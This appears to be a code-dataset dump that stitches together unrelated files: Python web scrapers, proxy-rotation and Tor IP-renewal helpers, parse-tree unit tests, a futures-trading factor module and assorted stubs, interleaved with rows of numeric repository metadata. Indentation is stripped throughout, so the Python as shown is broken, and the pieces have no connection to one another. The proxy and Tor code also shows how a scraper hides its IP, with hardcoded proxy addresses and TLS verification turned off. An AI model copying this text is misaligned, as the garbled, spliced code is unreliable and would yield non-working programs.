first_form = get_all_forms(url)[0]
# extract all form details
form_details = get_form_details(first_form)
pprint(form_details)
# the data body we want to submit
data = {}
for input_tag in form_details["inputs"]:
if input_tag["type"] == "hidden":
# if it's hidden, use the default value
data[input_tag["name"]] = input_tag["value"]
elif input_tag["type"] != "submit":
# all others except submit, prompt the user to set it
value = input(f"Enter the value of the field '{input_tag['name']}' (type: {input_tag['type']}): ")
data[input_tag["name"]] = value
# join the url with the action (form request URL)
url = urljoin(url, form_details["action"])
if form_details["method"] == "post":
res = session.post(url, data=data)
elif form_details["method"] == "get":
res = session.get(url, params=data)
# the below code is only for replacing relative URLs to absolute ones
soup = BeautifulSoup(res.content, "html.parser")
for link in soup.find_all("link"):
try:
link.attrs["href"] = urljoin(url, link.attrs["href"])
except:
pass
for script in soup.find_all("script"):
try:
script.attrs["src"] = urljoin(url, script.attrs["src"])
except:
pass
for img in soup.find_all("img"):
try:
img.attrs["src"] = urljoin(url, img.attrs["src"])
except:
pass
for a in soup.find_all("a"):
try:
a.attrs["href"] = urljoin(url, a.attrs["href"])
except:
pass
# write the page content to a file
open("page.html", "w").write(str(soup))
# open the page on the default browser
webbrowser.open("page.html")
import requests
import pandas as pd
from bs4 import BeautifulSoup as bs
USER_AGENT = "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
# US english
LANGUAGE = "en-US,enq=0.5"
def get_soup(url):
"""Constructs and returns a soup using the HTML content of url passed"""
# initialize a session
session = requests.Session()
# set the User-Agent as a regular browser
session.headers['User-Agent'] = USER_AGENT
# request for english content (optional)
session.headers['Accept-Language'] = LANGUAGE
session.headers['Content-Language'] = LANGUAGE
# make the request
html = session.get(url)
# return the soup
return bs(html.content, "html.parser")
def get_all_tables(soup):
"""Extracts and returns all tables in a soup object"""
return soup.find_all("table")
def get_table_headers(table):
"""Given a table soup, returns all the headers"""
headers = []
for th in table.find("tr").find_all("th"):
headers.append(th.text.strip())
return headers
def get_table_rows(table):
"""Given a table, returns all its rows"""
rows = []
for tr in table.find_all("tr")[1:]:
cells = []
# grab all td tags in this table row
tds = tr.find_all("td")
if len(tds) == 0:
# if no td tags, search for th tags
# can be found especially in wikipedia tables below the table
ths = tr.find_all("th")
for th in ths:
cells.append(th.text.strip())
else:
# use regular td tags
for td in tds:
cells.append(td.text.strip())
rows.append(cells)
return rows
def save_as_csv(table_name, headers, rows):
pd.DataFrame(rows, columns=headers).to_csv(f"{table_name}.csv")
def main(url):
# get the soup
soup = get_soup(url)
# extract all the tables from the web page
tables = get_all_tables(soup)
print(f"[+] Found a total of {len(tables)} tables.")
# iterate over all tables
for i, table in enumerate(tables, start=1):
# get the table headers
headers = get_table_headers(table)
# get all the rows of the table
rows = get_table_rows(table)
# save table as csv file
table_name = f"table-{i}"
print(f"[+] Saving {table_name}")
save_as_csv(table_name, headers, rows)
if __name__ == "__main__":
import sys
try:
url = sys.argv[1]
except IndexError:
print("Please specify a URL.\nUsage: python html_table_extractor.py [URL]")
exit(1)
main(url)
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
import colorama
# init the colorama module
colorama.init()
GREEN = colorama.Fore.GREEN
GRAY = colorama.Fore.LIGHTBLACK_EX
RESET = colorama.Fore.RESET
# initialize the set of links (unique links)
internal_urls = set()
external_urls = set()
total_urls_visited = 0
def is_valid(url):
"""
Checks whether url is a valid URL.
"""
parsed = urlparse(url)
return bool(parsed.netloc) and bool(parsed.scheme)
def get_all_website_links(url):
"""
Returns all URLs that is found on url in which it belongs to the same website
"""
# all URLs of url
urls = set()
# domain name of the URL without the protocol
domain_name = urlparse(url).netloc
soup = BeautifulSoup(requests.get(url).content, "html.parser")
for a_tag in soup.findAll("a"):
href = a_tag.attrs.get("href")
if href == "" or href is None:
# href empty tag
continue
# join the URL if it's relative (not absolute link)
href = urljoin(url, href)
parsed_href = urlparse(href)
# remove URL GET parameters, URL fragments, etc.
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
if not is_valid(href):
# not a valid URL
continue
if href in internal_urls:
# already in the set
continue
if domain_name not in href:
# external link
if href not in external_urls:
print(f"{GRAY}[!] External link: {href}{RESET}")
external_urls.add(href)
continue
print(f"{GREEN}[*] Internal link: {href}{RESET}")
urls.add(href)
internal_urls.add(href)
return urls
def crawl(url, max_urls=50):
"""
Crawls a web page and extracts all links.
You'll find all links in external_urls and internal_urls global set variables.
params:
max_urls (int): number of max urls to crawl, default is 30.
"""
global total_urls_visited
total_urls_visited += 1
links = get_all_website_links(url)
for link in links:
if total_urls_visited > max_urls:
break
crawl(link, max_urls=max_urls)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Link Extractor Tool with Python")
parser.add_argument("url", help="The URL to extract links from.")
parser.add_argument("-m", "--max-urls", help="Number of max URLs to crawl, default is 30.", default=30, type=int)
args = parser.parse_args()
url = args.url
max_urls = args.max_urls
crawl(url, max_urls=max_urls)
print("[+] Total Internal links:", len(internal_urls))
print("[+] Total External links:", len(external_urls))
print("[+] Total URLs:", len(external_urls) + len(internal_urls))
domain_name = urlparse(url).netloc
# save the internal links to a file
with open(f"{domain_name}_internal_links.txt", "w") as f:
for internal_link in internal_urls:
print(internal_link.strip(), file=f)
# save the external links to a file
with open(f"{domain_name}_external_links.txt", "w") as f:
for external_link in external_urls:
print(external_link.strip(), file=f)
import requests
import random
from bs4 import BeautifulSoup as bs
def get_free_proxies():
url = "https://free-proxy-list.net/"
# get the HTTP response and construct soup object
soup = bs(requests.get(url).content, "html.parser")
proxies = []
for row in soup.find("table", attrs={"id": "proxylisttable"}).find_all("tr")[1:]:
tds = row.find_all("td")
try:
ip = tds[0].text.strip()
port = tds[1].text.strip()
host = f"{ip}:{port}"
proxies.append(host)
except IndexError:
continue
return proxies
def get_session(proxies):
# construct an HTTP session
session = requests.Session()
# choose one random proxy
proxy = random.choice(proxies)
session.proxies = {"http": proxy, "https": proxy}
return session
if __name__ == "__main__":
# proxies = get_free_proxies()
proxies = [
'167.172.248.53:3128',
'194.226.34.132:5555',
'203.202.245.62:80',
'141.0.70.211:8080',
'118.69.50.155:80',
'201.55.164.177:3128',
'51.15.166.107:3128',
'91.205.218.64:80',
'128.199.237.57:8080',
]
for i in range(5):
s = get_session(proxies)
try:
print("Request page with IP:", s.get("http://icanhazip.com", timeout=1.5).text.strip())
except Exception as e:
continue
import requests
from stem.control import Controller
from stem import Signal
def get_tor_session():
# initialize a requests Session
session = requests.Session()
# setting the proxy of both http & https to the localhost:9050
# (Tor service must be installed and started in your machine)
session.proxies = {"http": "socks5://localhost:9050", "https": "socks5://localhost:9050"}
return session
def renew_connection():
with Controller.from_port(port=9051) as c:
c.authenticate()
# send NEWNYM signal to establish a new clean connection through the Tor network
c.signal(Signal.NEWNYM)
if __name__ == "__main__":
s = get_tor_session()
ip = s.get("http://icanhazip.com").text
print("IP:", ip)
renew_connection()
s = get_tor_session()
ip = s.get("http://icanhazip.com").text
print("IP:", ip)
import requests
def get_tor_session():
# initialize a requests Session
session = requests.Session()
# this requires a running Tor service in your machine and listening on port 9050 (by default)
session.proxies = {"http": "socks5://localhost:9050", "https": "socks5://localhost:9050"}
return session
if __name__ == "__main__":
s = get_tor_session()
ip = s.get("http://icanhazip.com").text
print("IP:", ip)
import requests
url = "http://icanhazip.com"
proxy_host = "proxy.crawlera.com"
proxy_port = "8010"
proxy_auth = ":"
proxies = {
"https": f"https://{proxy_auth}{proxy_host}:{proxy_port}/",
"http": f"http://{proxy_auth}{proxy_host}:{proxy_port}/"
}
r = requests.get(url, proxies=proxies, verify=False)
from bs4 import BeautifulSoup as bs
import requests
USER_AGENT = "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
# US english
LANGUAGE = "en-US,enq=0.5"
def get_weather_data(url):
session = requests.Session()
session.headers['User-Agent'] = USER_AGENT
session.headers['Accept-Language'] = LANGUAGE
session.headers['Content-Language'] = LANGUAGE
html = session.get(url)
# create a new soup
soup = bs(html.text, "html.parser")
# store all results on this dictionary
result = {}
# extract region
result['region'] = soup.find("div", attrs={"id": "wob_loc"}).text
# extract temperature now
result['temp_now'] = soup.find("span", attrs={"id": "wob_tm"}).text
# get the day and hour now
result['dayhour'] = soup.find("div", attrs={"id": "wob_dts"}).text
# get the actual weather
result['weather_now'] = soup.find("span", attrs={"id": "wob_dc"}).text
# get the precipitation
result['precipitation'] = soup.find("span", attrs={"id": "wob_pp"}).text
# get the % of humidity
result['humidity'] = soup.find("span", attrs={"id": "wob_hm"}).text
# extract the wind
result['wind'] = soup.find("span", attrs={"id": "wob_ws"}).text
# get next few days' weather
next_days = []
days = soup.find("div", attrs={"id": "wob_dp"})
for day in days.findAll("div", attrs={"class": "wob_df"}):
# extract the name of the day
day_name = day.find("div", attrs={"class": "vk_lgy"}).attrs['aria-label']
# get weather status for that day
weather = day.find("img").attrs["alt"]
temp = day.findAll("span", {"class": "wob_t"})
# maximum temparature in Celsius, use temp[1].text if you want fahrenheit
max_temp = temp[0].text
# minimum temparature in Celsius, use temp[3].text if you want fahrenheit
min_temp = temp[2].text
next_days.append({"name": day_name, "weather": weather, "max_temp": max_temp, "min_temp": min_temp})
# append to result
result['next_days'] = next_days
return result
if __name__ == "__main__":
URL = "https://www.google.com/search?lr=lang_en&ie=UTF-8&q=weather"
import argparse
parser = argparse.ArgumentParser(description="Quick Script for Extracting Weather data using Google Weather")
parser.add_argument("region", nargs="?", help="""Region to get weather for, must be available region.
Default is your current location determined by your IP Address""", default="")
# parse arguments
args = parser.parse_args()
region = args.region
URL += region
# get data
data = get_weather_data(URL)
# print data
print("Weather for:", data["region"])
print("Now:", data["dayhour"])
print(f"Temperature now: {data['temp_now']}C")
print("Description:", data['weather_now'])
print("Precipitation:", data["precipitation"])
print("Humidity:", data["humidity"])
print("Wind:", data["wind"])
print("Next days:")
for dayweather in data["next_days"]:
print("="*40, dayweather["name"], "="*40)
print("Description:", dayweather["weather"])
print(f"Max temperature: {dayweather['max_temp']}C")
print(f"Min temperature: {dayweather['min_temp']}C")
import requests
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
import sys
# URL of the web page you want to extract
url = sys.argv[1]
# initialize a session
session = requests.Session()
# set the User-agent as a regular browser
session.headers["User-Agent"] = "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
# get the HTML content
html = session.get(url).content
# parse HTML using beautiful soup
soup = bs(html, "html.parser")
# get the JavaScript files
script_files = []
for script in soup.find_all("script"):
if script.attrs.get("src"):
# if the tag has the attribute 'src'
script_url = urljoin(url, script.attrs.get("src"))
script_files.append(script_url)
# get the CSS files
css_files = []
for css in soup.find_all("link"):
if css.attrs.get("href"):
# if the link tag has the 'href' attribute
css_url = urljoin(url, css.attrs.get("href"))
css_files.append(css_url)
print("Total script files in the page:", len(script_files))
print("Total CSS files in the page:", len(css_files))
# write file links into files
with open("javascript_files.txt", "w") as f:
for js_file in script_files:
print(js_file, file=f)
with open("css_files.txt", "w") as f:
for css_file in css_files:
print(css_file, file=f)
import wikipedia
# print the summary of what python is
print(wikipedia.summary("Python Programming Language"))
# search for a term
result = wikipedia.search("Neural networks")
print("Result search of 'Neural networks':", result)
# get the page: Neural network
page = wikipedia.page(result[0])
# get the title of the page
title = page.title
# get the categories of the page
categories = page.categories
# get the whole wikipedia page text (content)
content = page.content
# get all the links in the page
links = page.links
# get the page references
references = page.references
# summary
summary = page.summary
# print info
print("Page content:\n", content, "\n")
print("Page title:", title, "\n")
print("Categories:", categories, "\n")
print("Links:", links, "\n")
print("References:", references, "\n")
print("Summary:", summary, "\n")
import requests
from bs4 import BeautifulSoup as bs
def get_video_info(url):
# download HTML code
content = requests.get(url)
# create beautiful soup object to parse HTML
soup = bs(content.content, "html.parser")
# initialize the result
result = {}
# video title
result['title'] = soup.find("span", attrs={"class": "watch-title"}).text.strip()
# video views (converted to integer)
result['views'] = int(soup.find("div", attrs={"class": "watch-view-count"}).text[:-6].replace(",", ""))
# video description
result['description'] = soup.find("p", attrs={"id": "eow-description"}).text
# date published
result['date_published'] = soup.find("strong", attrs={"class": "watch-time-text"}).text
# number of likes as integer
result['likes'] = int(soup.find("button", attrs={"title": "I like this"}).text.replace(",", ""))
# number of dislikes as integer
result['dislikes'] = int(soup.find("button", attrs={"title": "I dislike this"}).text.replace(",", ""))
# channel details
channel_tag = soup.find("div", attrs={"class": "yt-user-info"}).find("a")
# channel name
channel_name = channel_tag.text
# channel URL
channel_url = f"https://www.youtube.com{channel_tag['href']}"
# number of subscribers as str
channel_subscribers = soup.find("span", attrs={"class": "yt-subscriber-count"}).text.strip()
result['channel'] = {'name': channel_name, 'url': channel_url, 'subscribers': channel_subscribers}
return result
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="YouTube Video Data Extractor")
parser.add_argument("url", help="URL of the YouTube video")
args = parser.parse_args()
# parse the video URL from command line
url = args.url
data = get_video_info(url)
# print in nice format
print(f"Title: {data['title']}")
print(f"Views: {data['views']}")
print(f"\nDescription: {data['description']}\n")
print(data['date_published'])
print(f"Likes: {data['likes']}")
print(f"Dislikes: {data['dislikes']}")
print(f"\nChannel Name: {data['channel']['name']}")
print(f"Channel URL: {data['channel']['url']}")
print(f"Channel Subscribers: {data['channel']['subscribers']}")
| 33.686085
| 878
| 0.610527
| 113,339
| 854,077
| 4.447163
| 0.032107
| 0.007624
| 0.002405
| 0.004345
| 0.831838
| 0.817033
| 0.804562
| 0.797469
| 0.790097
| 0.78178
| 0
| 0.026355
| 0.273989
| 854,077
| 25,354
| 879
| 33.686085
| 0.786517
| 0.174313
| 0
| 0.839193
| 0
| 0.01856
| 0.10153
| 0.024756
| 0
| 0
| 0
| 0.000158
| 0.001693
| 0
| null | null | 0.006909
| 0.096999
| null | null | 0.062657
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4a0a2a16488fbcb23d6421199f8d56bd38298ee4
| 4,015
|
py
|
Python
|
src/tree_dict_test.py
|
yaricom/english-article-correction
|
e48e9af2d86e20ee0a3d091a5340a8669302c36a
|
[
"MIT"
] | 6
|
2017-06-05T08:58:55.000Z
|
2020-11-22T13:49:34.000Z
|
src/tree_dict_test.py
|
yaricom/english-article-correction
|
e48e9af2d86e20ee0a3d091a5340a8669302c36a
|
[
"MIT"
] | null | null | null |
src/tree_dict_test.py
|
yaricom/english-article-correction
|
e48e9af2d86e20ee0a3d091a5340a8669302c36a
|
[
"MIT"
] | 2
|
2017-04-24T08:19:06.000Z
|
2020-12-16T08:42:09.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
The tests for tree implementation
@author: yaric
"""
import unittest
import tree_dict as td
import config
import utils
class TestDeepTreeMethods(unittest.TestCase):
@classmethod
def setUpClass(cls):
data = utils.read_json(config.parse_train_path)
tree_dict = data[1]
root, index = td.treeFromJSON(tree_dict)
cls.root = root
def test_walk(self):
nodes = [n for n in td.walk(self.root)]
self.assertEqual(len(nodes), 125, "Nodes in the ROOT")
def test_leaves(self):
leaves = self.root.leaves()
self.assertEqual(len(leaves), 43, "Leaves in the ROOT")
def test_leaves_s_indexes(self):
leaves = self.root.leaves()
self.assertEqual(len(leaves), 43, "Leaves in the ROOT")
index = 0
for l in leaves:
self.assertEqual(l.s_index, index, "Index of leaf")
index += 1
def test_subtrees(self):
subtrees = self.root.subtrees()
self.assertEqual(len(subtrees), 82, "Subtrees in the ROOT [min_childs = 1]")
subtrees = self.root.subtrees(min_childs = 2)
self.assertEqual(len(subtrees), 28, "Subtrees in the ROOT [min_childs = 2]")
def test_np_subtrees(self):
subtrees = self.root.subtrees()
np_subtrees = 0
for st in subtrees:
if st.name == 'NP':
np_subtrees += 1
self.assertEqual(np_subtrees, 13, "NP Subtrees in the ROOT")
def test_deepNPSubtrees(self):
subtrees = self.root.deepNPSubtrees()
self.assertEqual(len(subtrees), 11, "Deep NP Subtrees in the ROOT")
def test_leaves_with_pos(self):
leaves = self.root.leavesWithPOS('DT')
self.assertEqual(len(leaves), 3, "Leaves with POS 'DT' in the ROOT")
def test_dpaSubtrees(self):
subtrees = self.root.dpaSubtrees()
self.assertEqual(len(subtrees), 3, "DPA Subtrees in the ROOT")
class TestShallowTreeMethods(unittest.TestCase):
@classmethod
def setUpClass(cls):
data = utils.read_json(config.parse_train_path)
tree_dict = data[723]
root, index = td.treeFromJSON(tree_dict)
cls.root = root
def test_walk(self):
nodes = [n for n in td.walk(self.root)]
self.assertEqual(len(nodes), 33, "Nodes in the ROOT")
def test_leaves(self):
leaves = self.root.leaves()
self.assertEqual(len(leaves), 14, "Leaves in the ROOT")
def test_leaves_s_indexes(self):
leaves = self.root.leaves()
self.assertEqual(len(leaves), 14, "Leaves in the ROOT")
index = 0
for l in leaves:
self.assertEqual(l.s_index, index, "Index of leaf")
index += 1
def test_subtrees(self):
subtrees = self.root.subtrees()
self.assertEqual(len(subtrees), 19, "Subtrees in the ROOT [min_childs = 1]")
subtrees = self.root.subtrees(min_childs = 2)
self.assertEqual(len(subtrees), 2, "Subtrees in the ROOT [min_childs = 2]")
def test_np_subtrees(self):
subtrees = self.root.subtrees()
np_subtrees = 0
for st in subtrees:
if st.name == 'NP':
np_subtrees += 1
self.assertEqual(np_subtrees, 4, "NP Subtrees in the ROOT")
def test_deepNPSubtrees(self):
subtrees = self.root.deepNPSubtrees()
self.assertEqual(len(subtrees), 4, "Deep NP Subtrees in the ROOT")
def test_leaves_with_pos(self):
leaves = self.root.leavesWithPOS('DT')
self.assertEqual(len(leaves), 1, "Leaves with POS 'DT' in the ROOT")
def test_dpaSubtrees(self):
subtrees = self.root.dpaSubtrees()
self.assertEqual(len(subtrees), 0, "DPA Subtrees in the ROOT")
if __name__ == '__main__':
unittest.main()
| 32.12
| 84
| 0.596015
| 502
| 4,015
| 4.649402
| 0.165339
| 0.128535
| 0.069409
| 0.051414
| 0.905741
| 0.888603
| 0.888603
| 0.888603
| 0.888603
| 0.888603
| 0
| 0.017637
| 0.293898
| 4,015
| 125
| 85
| 32.12
| 0.805644
| 0.023163
| 0
| 0.727273
| 0
| 0
| 0.130301
| 0
| 0
| 0
| 0
| 0
| 0.227273
| 1
| 0.204545
| false
| 0
| 0.045455
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4a118f04c0bbe52b576cf244b8fc711216b27b01
| 196
|
py
|
Python
|
Scraping/espirito_santo.py
|
Insper-Data/data_bcg_news
|
49986db18095759adea00bb0dedc149acebb683b
|
[
"MIT"
] | null | null | null |
Scraping/espirito_santo.py
|
Insper-Data/data_bcg_news
|
49986db18095759adea00bb0dedc149acebb683b
|
[
"MIT"
] | null | null | null |
Scraping/espirito_santo.py
|
Insper-Data/data_bcg_news
|
49986db18095759adea00bb0dedc149acebb683b
|
[
"MIT"
] | null | null | null |
import time
from selenium import webdriver
from selenium import webdriver
driver = webdriver.Firefox(executable_path= r"C:\Users\siddhartha\Downloads\geckodriver-v0.25.0-win64\geckodriver.exe")
| 32.666667
| 119
| 0.826531
| 27
| 196
| 5.962963
| 0.740741
| 0.149068
| 0.223602
| 0.335404
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033333
| 0.081633
| 196
| 5
| 120
| 39.2
| 0.861111
| 0
| 0
| 0.5
| 0
| 0.25
| 0.362245
| 0.362245
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c596a34e57ad7da889c88b759979a97b7d0f5ba7
| 1,264
|
py
|
Python
|
tests/test_queries.py
|
eugene-davis/ebr-board
|
f592a752e17e869a6fd35ef82398f97748dbdc78
|
[
"Apache-2.0"
] | null | null | null |
tests/test_queries.py
|
eugene-davis/ebr-board
|
f592a752e17e869a6fd35ef82398f97748dbdc78
|
[
"Apache-2.0"
] | 4
|
2019-08-02T09:35:51.000Z
|
2019-08-05T04:45:47.000Z
|
tests/test_queries.py
|
LaudateCorpus1/ebr-board
|
f592a752e17e869a6fd35ef82398f97748dbdc78
|
[
"Apache-2.0"
] | 1
|
2021-09-14T03:58:40.000Z
|
2021-09-14T03:58:40.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `ebr_board` package."""
import pytest
from unittest.mock import patch
from ebr_board.database.queries import make_query
@patch("ebr_board.database.queries.BuildResults")
def test_make_query(mock_build_results):
"""
Basic smoke test for make_query
"""
result = make_query("test_index", None, [], [], agg=None, size=1, start=0)
assert mock_build_results.search.called_with("test_index")
assert mock_build_results.search.source.called_with([], [])
assert mock_build_results.search.query.called_with("bool", filter=[None])
assert mock_build_results.search.execute.called_with()
@patch("ebr_board.database.queries.BuildResults")
def test_make_query_agg(mock_build_results):
"""
Basic smoke test for make_query with aggregation
"""
result = make_query("test_index", None, [], [], agg="agg", size=1, start=0)
assert mock_build_results.search.called_with("test_index")
assert mock_build_results.search.source.called_with([], [])
assert mock_build_results.search.aggs.metric.called_with("fail_count", "agg")
assert mock_build_results.search.query.called_with("bool", filter=[None])
assert mock_build_results.search.execute.called_with()
| 34.162162
| 81
| 0.735759
| 176
| 1,264
| 5
| 0.284091
| 0.1125
| 0.2
| 0.225
| 0.788636
| 0.788636
| 0.788636
| 0.718182
| 0.718182
| 0.622727
| 0
| 0.004533
| 0.127373
| 1,264
| 36
| 82
| 35.111111
| 0.793291
| 0.121835
| 0
| 0.555556
| 0
| 0
| 0.132339
| 0.072693
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.111111
| false
| 0
| 0.166667
| 0
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c5badeb05e4ec40a28d9a9aa7091d2cf623db5d4
| 176
|
py
|
Python
|
{{ cookiecutter.tool_name_slug }}/{{ cookiecutter.tool_name_slug }}/core/exceptions.py
|
polyglot-jones/cookiecutter-cli-filter
|
cc2552d16c619369c8f77cc4b4271e89ffbca6f8
|
[
"BSD-3-Clause"
] | null | null | null |
{{ cookiecutter.tool_name_slug }}/{{ cookiecutter.tool_name_slug }}/core/exceptions.py
|
polyglot-jones/cookiecutter-cli-filter
|
cc2552d16c619369c8f77cc4b4271e89ffbca6f8
|
[
"BSD-3-Clause"
] | null | null | null |
{{ cookiecutter.tool_name_slug }}/{{ cookiecutter.tool_name_slug }}/core/exceptions.py
|
polyglot-jones/cookiecutter-cli-filter
|
cc2552d16c619369c8f77cc4b4271e89ffbca6f8
|
[
"BSD-3-Clause"
] | null | null | null |
from gwpycore import GruntWurkError
class {{ cookiecutter.tool_name_camel_case }}Error(GruntWurkError):
pass
__all__ = ("{{ cookiecutter.tool_name_camel_case }}Error",)
| 22
| 67
| 0.772727
| 20
| 176
| 6.3
| 0.65
| 0.253968
| 0.31746
| 0.396825
| 0.539683
| 0.539683
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119318
| 176
| 7
| 68
| 25.142857
| 0.812903
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0.1875
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.25
| 0.25
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
c5ee74924a78c9c0df766e716d4888d5214109a1
| 2,793
|
py
|
Python
|
czsc/factors/bi_end.py
|
MakeBigBigMoney/czsc
|
8450c8912904b1d66a5c6e78d42c1b7d4b3d1777
|
[
"MIT"
] | 1
|
2021-07-07T11:15:48.000Z
|
2021-07-07T11:15:48.000Z
|
czsc/factors/bi_end.py
|
MakeBigBigMoney/czsc
|
8450c8912904b1d66a5c6e78d42c1b7d4b3d1777
|
[
"MIT"
] | null | null | null |
czsc/factors/bi_end.py
|
MakeBigBigMoney/czsc
|
8450c8912904b1d66a5c6e78d42c1b7d4b3d1777
|
[
"MIT"
] | null | null | null |
# coding: utf-8
import warnings
from typing import List, Dict, OrderedDict
from ..enum import Signals, Factors, Freq
from ..factors.utils import match_factor
# ======================================================================================================================
def future_bi_end_f30_base(s: [Dict, OrderedDict]):
"""期货30分钟笔结束"""
v = Factors.Other.value
for f_ in [Freq.F30.value, Freq.F5.value, Freq.F1.value]:
if f_ not in s['级别列表']:
warnings.warn(f"{f_} not in {s['级别列表']},默认返回 Other")
return v
# 开多仓因子
# --------------------------------------------------------------------------------------------------------------
long_opens = {
Factors.L2A0.value: [
[f"{Freq.F30.value}_倒1表里关系#{Signals.BD0.value}"],
]
}
for name, factors in long_opens.items():
for factor in factors:
if match_factor(s, factor):
v = name
# 平多仓因子
# --------------------------------------------------------------------------------------------------------------
long_exits = {
Factors.S2A0.value: [
[f"{Freq.F30.value}_倒1表里关系#{Signals.BU0.value}"],
]
}
for name, factors in long_exits.items():
for factor in factors:
if match_factor(s, factor):
v = name
return v
future_bi_end_f30 = future_bi_end_f30_base
# ======================================================================================================================
def share_bi_end_f30_base(s: [Dict, OrderedDict]):
"""股票30分钟笔结束"""
v = Factors.Other.value
for f_ in [Freq.F30.value, Freq.F5.value, Freq.F1.value]:
if f_ not in s['级别列表']:
warnings.warn(f"{f_} not in {s['级别列表']},默认返回 Other")
return v
# 平多仓因子
# --------------------------------------------------------------------------------------------------------------
long_exits = {
Factors.S2A0.value: [
[f"{Freq.F30.value}_倒1表里关系#{Signals.BU0.value}"],
]
}
for name, factors in long_exits.items():
for factor in factors:
if match_factor(s, factor):
v = name
# 开多仓因子
# --------------------------------------------------------------------------------------------------------------
long_opens = {
Factors.L2A0.value: [
[f"{Freq.F30.value}_倒1表里关系#{Signals.BD0.value}"],
]
}
for name, factors in long_opens.items():
for factor in factors:
if match_factor(s, factor):
v = name
return v
share_bi_end_f30 = share_bi_end_f30_base
# ======================================================================================================================
| 32.476744
| 120
| 0.39599
| 261
| 2,793
| 4.065134
| 0.203065
| 0.028275
| 0.04524
| 0.04524
| 0.835061
| 0.791706
| 0.791706
| 0.738926
| 0.738926
| 0.738926
| 0
| 0.022801
| 0.230576
| 2,793
| 85
| 121
| 32.858824
| 0.470917
| 0.307555
| 0
| 0.714286
| 0
| 0
| 0.129843
| 0.090052
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.071429
| 0
| 0.178571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
680a944bd3911775dbc4aec05d6d674384582a13
| 98
|
py
|
Python
|
src/wandb_allennlp/training/__init__.py
|
mfa/wandb-allennlp
|
29ebba81cdbd83653350d00911c4a54d8da9def1
|
[
"MIT"
] | 22
|
2020-03-28T10:28:26.000Z
|
2022-02-17T12:31:17.000Z
|
src/wandb_allennlp/training/__init__.py
|
mfa/wandb-allennlp
|
29ebba81cdbd83653350d00911c4a54d8da9def1
|
[
"MIT"
] | 14
|
2020-03-21T17:04:40.000Z
|
2021-09-27T10:11:19.000Z
|
src/wandb_allennlp/training/__init__.py
|
mfa/wandb-allennlp
|
29ebba81cdbd83653350d00911c4a54d8da9def1
|
[
"MIT"
] | 4
|
2020-04-18T10:33:34.000Z
|
2021-02-02T11:57:28.000Z
|
from wandb_allennlp.training import train_and_test
from wandb_allennlp.training import callbacks
| 32.666667
| 51
| 0.887755
| 14
| 98
| 5.928571
| 0.642857
| 0.216867
| 0.409639
| 0.60241
| 0.746988
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091837
| 98
| 2
| 52
| 49
| 0.932584
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
68100532ca2e665d9bdb08f2737cdbb883c5a1c5
| 4,951
|
py
|
Python
|
models/general/resnet.py
|
